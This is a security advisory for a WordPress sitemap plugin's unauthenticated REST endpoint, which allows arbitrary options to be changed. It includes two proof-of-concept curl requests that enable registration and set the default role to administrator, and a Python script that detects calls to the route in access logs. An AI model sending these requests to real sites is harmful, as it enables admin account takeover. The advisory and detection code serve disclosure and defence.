The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as users_can_register and default_role, allowing them to create a new admin account and take over the blog.
Allow user registrations:
curl 'https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX' \
-H 'Content-Type: application/json' \
--data '{"users_can_register": 1}'
Set the default user role to administrator:
curl 'https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX' \
-H 'Content-Type: application/json' \
--data '{"default_role":"administrator"}'
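For triage, the following added example (not part of the original advisory or the plugin's code) scans web server access logs for requests to the route above, in both its ?rest_route= form and the equivalent /wp-json/ form. The Combined Log Format and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Route from the advisory, lowercased for case-insensitive comparison.
ROUTE = "/click5_sitemap/api/update_html_option_ajax"

# Assumed log format: Apache/nginx Combined Log Format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "POST /?rest_route=/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 200 15 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Jan/2024:10:00:03 +0000] "POST /?rest_route=%2Fclick5_sitemap%2FAPI%2Fupdate_html_option_AJAX HTTP/1.1" 200 15 "-" "curl/8.0"',
    '198.51.100.4 - - [10/Jan/2024:10:05:00 +0000] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 200 15 "-" "-"',
    '198.51.100.9 - - [10/Jan/2024:10:06:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jan/2024:10:06:02 +0000] "GET /sitemap.xml HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def rest_route_of(target):
    """Return the REST route a request target addresses, or None."""
    parts = urlsplit(target)
    # Query-string form: /?rest_route=/namespace/route (parse_qs URL-decodes it).
    routes = parse_qs(parts.query).get("rest_route")
    if routes:
        return routes[0]
    # Pretty-permalink form: /wp-json/namespace/route
    path = unquote(parts.path)
    idx = path.find("/wp-json/")
    return path[idx + len("/wp-json"):] if idx != -1 else None

def find_hits(lines):
    """Return (ip, timestamp, method, status) for each request to ROUTE."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        route = rest_route_of(m["target"]) if m else None
        if route and route.rstrip("/").lower() == ROUTE:
            hits.append((m["ip"], m["ts"], m["method"], int(m["status"])))
    return hits

if __name__ == "__main__":
    hits = find_hits(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print(Counter(ip for ip, *_ in hits).most_common())
```

Access logs normally do not record the request body, so a hit shows that the endpoint was called, not which option was changed. Confirm by checking the current values of users_can_register and default_role on the site.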